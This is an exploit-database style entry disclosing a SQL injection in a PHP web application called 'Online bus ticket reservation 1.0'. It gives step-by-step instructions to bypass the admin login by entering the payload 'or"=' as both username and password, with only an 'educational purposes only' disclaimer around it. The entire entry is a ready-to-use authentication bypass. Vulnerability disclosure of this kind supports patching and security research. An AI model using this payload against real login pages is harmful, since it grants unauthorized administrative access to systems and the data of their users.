Online bus ticket reservation 1.0 sql injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-12-08 |
Type : webapps |
Platform : php
This exploit / vulnerability Online bus ticket reservation 1.0 sql injection is for educational purposes only and if it is used you will do on your own risk!
#Exploit
Open the Application
check the URL:
http://localhost/busreservation/index.php
Open Admin Login
Enter username: 'or"='
Enter password: 'or"='
click on login
The SQL payload gets executed and authorization is bypassed successfully